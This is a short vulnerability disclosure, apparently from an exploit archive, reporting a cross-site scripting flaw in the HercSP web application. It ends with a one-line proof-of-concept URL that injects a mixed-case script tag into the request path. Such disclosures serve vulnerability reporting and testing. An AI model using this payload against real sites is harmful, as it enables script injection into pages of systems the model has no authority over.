HercSP suffers from a cross site scripting vulnerability.
32b84d2c5b473e4dd8e3cd4460d91b32e8178dac6685fd3b3c6029d150c88143
#
# Title : HercSP XSS Vulnerability
# Author : Red Security TEAM
# Date : 29/01/2012
# Demo : http://demo.hercsp.herculescore.org/
# Download : http://code.google.com/p/hercsp/downloads/list
# Tested On : CentOS
# Contact : Info [ 4t ] RedSecurity [ d0t ] COM
# Home : http://RedSecurity.COM
#
# Exploit :
#
# http://server.com/index.php/1-->1<ScRiPt>prompt(0)</ScRiPt> <!--
#